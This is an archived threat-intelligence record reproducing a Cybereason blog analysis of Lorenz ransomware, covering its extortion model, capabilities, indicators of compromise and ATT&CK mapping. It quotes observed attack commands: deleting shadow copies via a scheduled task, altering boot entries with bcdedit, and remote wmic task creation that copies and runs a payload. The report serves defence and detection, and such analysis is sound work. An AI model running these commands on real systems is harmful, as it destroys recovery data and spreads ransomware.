{ "id": "8141a27f-551c-4b98-b0b6-3bb85cc2dba8", "created_at": "2026-04-06T01:31:09.737499Z", "updated_at": "2026-04-10T03:21:45.295587Z", "deleted_at": null, "sha1_hash": "5eb4cbd5cb6e06cc6a66aedeb080f40f103f2422", "title": "Cybereason vs. Lorenz Ransomware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2446060, "plain_text": "Cybereason vs. Lorenz Ransomware\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-06 00:52:25 UTC\r\nLorenz is a ransomware strain observed first in February of 2021, and is believed to be a rebranding of the “.sZ40”\r\nransomware that was discovered in October 2020. Lorenz targets organizations worldwide with customized attacks\r\ndemanding hundreds of thousands of dollars, and even millions in ransom fee. \r\nThe group is targeting victims mostly in English-speaking countries, and according to their website, the group has published\r\nstolen data from more than 20 victims, although the estimated number of successful attacks is believed to be higher.\r\nCybereason detects and prevents Lorenz Ransomware\r\nAccording reports, Lorenz appears to be the same as ThunderCrypt ransomware observed all the way back in May 2017.\r\nHowever, it’s not clear if Lorenz was created by the same group or if the group purchased the source code of ThunderCrypt\r\nand created its own variant.\r\nShortly after Lorenz was discovered, the group faced a temporary problem after researchers published a free decryptor\r\n(download here). The decryptor was released by the project No More Ransom, a joint project by law enforcement agencies\r\nincluding Europol's European Cybercrime Center.\r\nIt’s worth noting that that decrypter is very limited and only supports .docx, .pptx, .xlsx and .zip. In addition, in the test that\r\nwe ran for both old and newer samples - the decrypter did not work and kept alerting that it doesn’t support the files (we\r\ntried encrypted docx files: \u003cname\u003e.docx.Lorenz.sz40 type):\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 1 of 13\n\nLorenz Leaks website\r\nKey Details\r\nEver Evolving Ransomware: The Lorenz group keeps changing the ransomware capabilities and behavior\r\nfrequently, making it customized to their victims.\r\nHigh Severity: The Cybereason Nocturnus Team assesses the threat level as HIGH given the destructive potential of\r\nthe attacks.\r\nHuman Operated Attack: Prior to the deployment of the ransomware, the attackers attempt to infiltrate and move\r\nlaterally throughout the organization, carrying out a fully-developed RansomOps attack.\r\nInteresting Way of Leaking Data: The Lorenz group has a few steps in their leaking data process. From selling it to\r\nother threat actors, releasing password-protected RAR archives containing the victim's data, and also selling DBs and\r\naccess to internal networks.\r\nDetected and Prevented: The Cybereason XDR Platform fully detects and prevents the Lorenz ransomware. \r\nBreaking Down the Attack\r\nNot A Typical Spear-Phishing Attack\r\nThe Lorenz operators put a lot of effort into their attacks. They study their target’s employees, suppliers and partners. This\r\nway, the Lorenz group can even go from one, already compromised victim, to another. The knowledge they have collected is\r\nused to customize the attack specifically for the target. \r\nIn a reported incident, the attackers used one compromised victim to “jump” to another. The group gained access to the\r\nnetwork via a phishing email, but not just any phishing email. The group, after doing their research on the target, sent the\r\nemail from a legitimate email account of a real employee at a supplier that they'd already been compromised. This way the\r\nemail appears to be legitimate and increases the chances of falling to the scam.\r\nThen the attackers trick employees into installing an application that provides the attackers with full access to the network,\r\nincluding the employees’ email, even after they reset their passwords. In some cases, the attackers even used the\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 2 of 13\n\ncompromised email accounts to email the IT, legal, and cyber insurance teams working with the targeted organization to\r\nthreaten further attacks if they didn’t pay.\r\nDownloading the Ransomware\r\nAfter gaining an initial foothold in the network, the attackers start to perform reconnaissance commands, move laterally\r\nwithin the network, and collect sensitive data including credentials, file, databases and emails.\r\nThe main goal for the attackers when moving laterally is to compromise a domain controller and obtain domain\r\nadministrator credentials. This allows them to perform additional activities, and later on selling access to the compromised\r\nnetwork.\r\nSince the Lorenz group customize the attack for the target, we have observed different binaries of Lorenz that have different\r\nbehavior. This can also point to the fact that the Lorenz group continues to update the ransomware, even if that means to\r\ncreate changes frequently.\r\nRansomware Capabilities\r\nSince the ransomware binary files are customized for nearly every attack,, there are different behaviors and capabilities\r\nobserved in different samples, some of them were seen used combined. Some of the capabilities were observed only in older\r\nversions, and some made a comeback in the newer and then disappeared again. \r\nTo put things into order, following are the main behavior and capabilities observed among the ransomware binaries:\r\nDeleting the Shadow Copies\r\nSome of the Lorenz binaries observed used the well known vssadmin command to delete the virtual shadow copies of the\r\nsystem. Vssadmin.exe is a command-line tool that manages Volume Shadow Copy Service (VSS), which captures and\r\ncopies stable images for backup on running systems.\r\nRansomware commonly uses vssadmin.exe to delete shadow copies and other backups of files before encrypting the files\r\nthemselves. This is another way to ensure that the victim will be forced to pay to decrypt the valuable files when they can\r\nneither be decrypted or retrieved from VSS.\r\nLorenz creates a scheduled task whose name starts with “sz40” and then sets it to run Vssadmin with the following\r\ncommand line. After running, the scheduled task is deleted.\r\ncmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz403 /TR \"vssadmin Delete Shadows /For=C:\"\r\n\u0026SCHTASKS /run /TN sz403\u0026SCHTASKS /Delete /TN sz403 /F\r\nschtasks command as seen in the Cybereason XDR Platform\r\nCreating a New Boot Entry\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 3 of 13\n\nOne unique behavior observed in some of the Lorenz binary is the creation of another boot entry for possibly misleading\r\npurposes. A boot entry is a set of options that defines a load configuration for an operating system or bootable program. It is\r\npossible to have multiple boot entries for an operating system, each with a different set of boot parameters. \r\nLorenz uses the command utility bcdedit to copy the existing boot entry and modify it, which is the most common way to\r\ncreate a new boot entry. But it does one strange thing. The /timeout operator is set to 100,000 seconds, which is about 27 (!)\r\nhours.\r\nBy doing so, the system waits 27 hours before the boot manager selects the default entry if the user doesn’t choose manually.\r\nSince Lorenz changes the description of the boot entries to “Lorenz Encrypt System”, the user can be misled that the\r\noperating system is compromised entirely. In addition, if it is a system that operates without user interaction or that the\r\nsystem is not in the network and it’s impossible to connect, the system will not load the OS for 27 hours.\r\ncmd.exe /c bcdedit /copy {current} /d \"Lorenz Encrypt System\" \u0026 bcdedit /set {current} description \"Lorenz Encrypt System\"\r\n\u0026 bcdedit /timeout 100000 \u0026\u0026 ipconfig\r\nbcdedit command as seen in the Cybereason XDR Platform\r\n Windows boot manager after Lorenz infection\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 4 of 13\n\nCreating Remote Scheduled Tasks\r\nSome of the samples observed created a remote scheduled task that launches another ransomware binary located on a remote\r\nserver within the infected network. This indicates that the attackers performed lateral movement in the environment,\r\ncollected information and harvest credentials before launching the ransomware payload.\r\nThe scheduled tasks names observed in the binaries are consistent with the names found when creating other scheduled tasks\r\nin other binaries, and starts with “sz40”. After execution, the malware deletes the scheduled task to remove tracks.\r\nwmic /node:'\u003cIP\u003e’' /USER:'\u003cdomain\u003e\\\u003cusername\u003e' /PASSWORD:'\u003cpassword\u003e' process call create \"cmd.exe /c schtasks\r\n/Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \\\\\u003cdomain\u003e\\NETLOGON\\weams.exe %windir%lsamp.exe \u0026\r\nstart %windir%lsamp.exe' \u0026 SCHTASKS /run /TN sz401\u0026SCHTASKS /Delete /TN sz401 /F\"\r\nChanging the Wallpaper\r\nSome of Lorenz binaries are also configured to change the desktop image of the machine in an additional way to alert the\r\nuser about what happened. The wallpaper image is either called “Lorenz.bmp”  or a random name. Lorenz drops the .bmp\r\nfile into %ProgramFiles% or %Windows% folder and then sets the relevant registry keys to configure it as a desktop\r\nwallpaper. The wallpaper is changed after reboot of the machine:\r\nImage used as desktop\r\nbackground by Lorenz\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 5 of 13\n\nLorenz execution as shown in the Cybereason XDR Platform\r\nClearing Windows Event Logs\r\nSome older versions of Lorenz found on domain controllers were observed deleting the Windows Event Logs to remove\r\ntracks of the malicious activities. Among the logs deleted are Windows PowerShell logs that contain information about\r\nPowerShell activities, which suggests the attacker has used them at some point in the attack:\r\nClearing\r\nEvent Logs command as seen in the Cybereason XDR Platform\r\nFile Encryption\r\nLorenz uses AES encryption to encrypt the files. For each encrypted file, it appends the extension “.Lorenz.sz40”. The\r\noriginal files are then deleted. In addition, Lorenz writes to each folder a ransom note named\r\n“HELP_SECURITY_EVENT.html” (recently changed to “HELP.txt”) that contains information about what happened to the\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 6 of 13\n\nfiles, including a link to Lorenz data leak website and a unique TOR payment website where the victim can see the\r\ndemanded ransom fee and contact the group:\r\nEncrypted files and ransom note\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 7 of 13\n\nLorenz ransom note\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 8 of 13\n\nAn Interesting Way of Leaking Stolen Data\r\nLorenz has created a relatively unique extortion technique. After stealing files, emails, credentials and databases from\r\nvictims, the group threatens to publish them in their data leaks website. When Lorenz publishes data, they do things a bit\r\ndifferently compared to other ransomware gangs.\r\nFirst, Lorenz makes the data available for sale to other threat actors, hackers or possible competitors. After a while, they start\r\nreleasing password-protected RAR archives containing the victim's data. If no ransom is paid, and the data is not purchased,\r\nLorenz releases the password for the RAR archives containing the data leak so that they are publicly available to anyone\r\nwho downloads the files.\r\nBeside giving access to the stolen data, Lorenz, in order to maximize profit, sell access to the internal network they have\r\ncompromised. This trend is starting to gain popularity among other ransomware gangs as well, due to the understanding that\r\nfor some threat actors, access to the networks could be more valuable than the data itself:\r\nLorenz Leaks website\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 9 of 13\n\nLorenz Leaks website\r\nCybereason Detection and Prevention\r\nThe Cybereason XDR Platform is able to prevent the execution of the Lorenz Ransomware using multi-layer protection that\r\ndetects and blocks malware with threat intelligence, machine learning, and next-gen antivirus (NGAV) capabilities.\r\nAdditionally, when the Anti-Ransomware feature is enabled, behavioral detection techniques in the platform are able to\r\ndetect and prevent any attempt to encrypt files and generates a MalOpTM for it:\r\nMalOp for Lorenz\r\nransomware as shown in the Cybereason XDR Platform\r\nMalOp for Lorenz ransomware as shown in the Cybereason XDR Platform\r\nUsing the Anti-Malware feature with the right configurations (listed in the recommendations below), the Cybereason XDR\r\nPlatform will also detect and prevent the execution of the ransomware and ensure that it cannot encrypt targeted files. The\r\nprevention is based on machine learning, which blocks both known and unknown malware variants:\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 10 of 13\n\nCybereason user notification for preventing the execution of Lorenz - unknown hash\r\nSecurity Recommendations\r\nEnable the Anti-Ransomware Feature on Cybereason NGAV: Set Cybereason Anti-Ransomware protection mode\r\nto Prevent - more information for Cybereason customers can be found here\r\nEnable Anti-Malware Feature on Cybereason NGAV: Set Cybereason Anti-Malware mode to Prevent and set the\r\ndetection mode to Moderate and above - more information for Cybereason customers can be found here\r\nKeep Systems Fully Patched: Make sure your systems are patched in order to mitigate vulnerabilities\r\nRegularly Backup Files to a Remote Server: Restoring your files from a backup is the fastest way to regain access\r\nto your data\r\nUse Security Solutions: Protect your environment using organizational firewalls, proxies, web filtering, and mail\r\nfiltering\r\nIndicators of Compromise\r\nIOC Type Description\r\n8ea6a6d4578029c7b2dbbfb525ec88b2cb309901ec5a987847471b6101f0de41\r\n971f0a32094b8ac10712503305ac6789048d190a209c436839e2e6b0acb016f3\r\ncef17b9289ba18c979b704648c0f2b736f65f9f9158b471bc2486b6c14e14a4d\r\nedc2070fd8116f1df5c8d419189331ec606d10062818c5f3de865cd0f7d6db84\r\na0ccb9019b90716c8ee1bc0829e0e04cf7166be2f25987abbc8987e65cef2e6f\r\n1264b40feaa824d5ba31cef3c8a4ede230c61ef71c8a7994875deefe32bd8b3d\r\n40ff1ab8ac09057421079dae83fb675d7a2a3da6c7d0cd6400a0d720c5b0f58c\r\na9fdbc6d20b780ca42660ad4803f391308fa0243fbc515fd3c1acf935dd43c1e\r\n7275034886da11ca6d828547f15cab259e22ba624c5f5762afd237aa686455dd\r\n5b03b861884cb3e14a8b888c7dee2ee0d494933df863d504882345fa278d1ea5\r\nSHA256 Lorenz binaries\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 11 of 13\n\n71cdbbc62e10983db183ca60ab964c1a3dab0d279c5326b2e920522480780956\r\n4b1170f7774acfdc5517fbe1c911f2bd9f1af498f3c3d25078f05c95701cc999\r\nc0c99b141b014c8e2a5c586586ae9dc01fd634ea977e2714fbef62d7626eb3fb\r\n162.33.179[.]45\r\n172.86.75[.]63\r\n65.21.187[.]237\r\n167.99.186[.]156\r\n157.90.147[.]28\r\n143.198.117[.]43 \r\n45.61.139[.]150\r\nIP C2\r\nMITRE ATT\u0026CK TECHNIQUES\r\nInitial\r\nAccess\r\nLateral\r\nMovement\r\nExecution\r\nDefense\r\nEvasion\r\nCredential\r\nAccess\r\nDiscovery Collection Impact\r\nPhishing\r\nTaint\r\nShared\r\nContent\r\nCommand and\r\nScripting\r\nInterpreter:\r\nPowerShell\r\nMasquerading\r\nCredentials\r\nfrom\r\nPassword\r\nStores\r\nAccount\r\nDiscovery\r\nData from\r\nLocal\r\nSystem\r\nData\r\nEncrypted\r\nfor\r\nImpact\r\nValid\r\nAccounts\r\nRemote\r\nFile Copy\r\nScheduled\r\nTask/Job\r\n \r\nSystem\r\nInformation\r\nDiscovery\r\n \r\nInhibit\r\nSystem\r\nRecovery\r\nTrusted\r\nRelationship\r\nWindows\r\nManagement\r\nInstrumentation\r\n   \r\nFile and\r\nDirectory\r\nDiscovery\r\n   \r\n             \r\nAbout the Researcher:\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 12 of 13\n\nLIOR ROCHBERGER, SENIOR THREAT RESEARCHER AND\r\nTHREAT HUNTER, CYBEREASON\r\nAs part of the Nocturnus team at Cybereason, Lior has created procedures to lead threat hunting, reverse engineering and\r\nmalware analysis teams. Lior has also been a contributing researcher to multiple threat and malware blogs including\r\nBitbucket, Valak, Ramnit, and Racoon stealer. Prior to Cybereason, Lior led SOC operations within the Israeli Air Force.\r\nAbout the Author\r\nCybereason Nocturnus\r\n \r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and\r\nenterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies,\r\nreverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first\r\nto release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.\r\nAll Posts by Cybereason Nocturnus\r\nSource: https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware" ], "report_names": [ "cybereason-vs.-lorenz-ransomware" ], "threat_actors": [], "ts_created_at": 1775439069, "ts_updated_at": 1775791305, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5eb4cbd5cb6e06cc6a66aedeb080f40f103f2422.pdf", "text": "https://archive.orkl.eu/5eb4cbd5cb6e06cc6a66aedeb080f40f103f2422.txt", "img": "https://archive.orkl.eu/5eb4cbd5cb6e06cc6a66aedeb080f40f103f2422.jpg" } }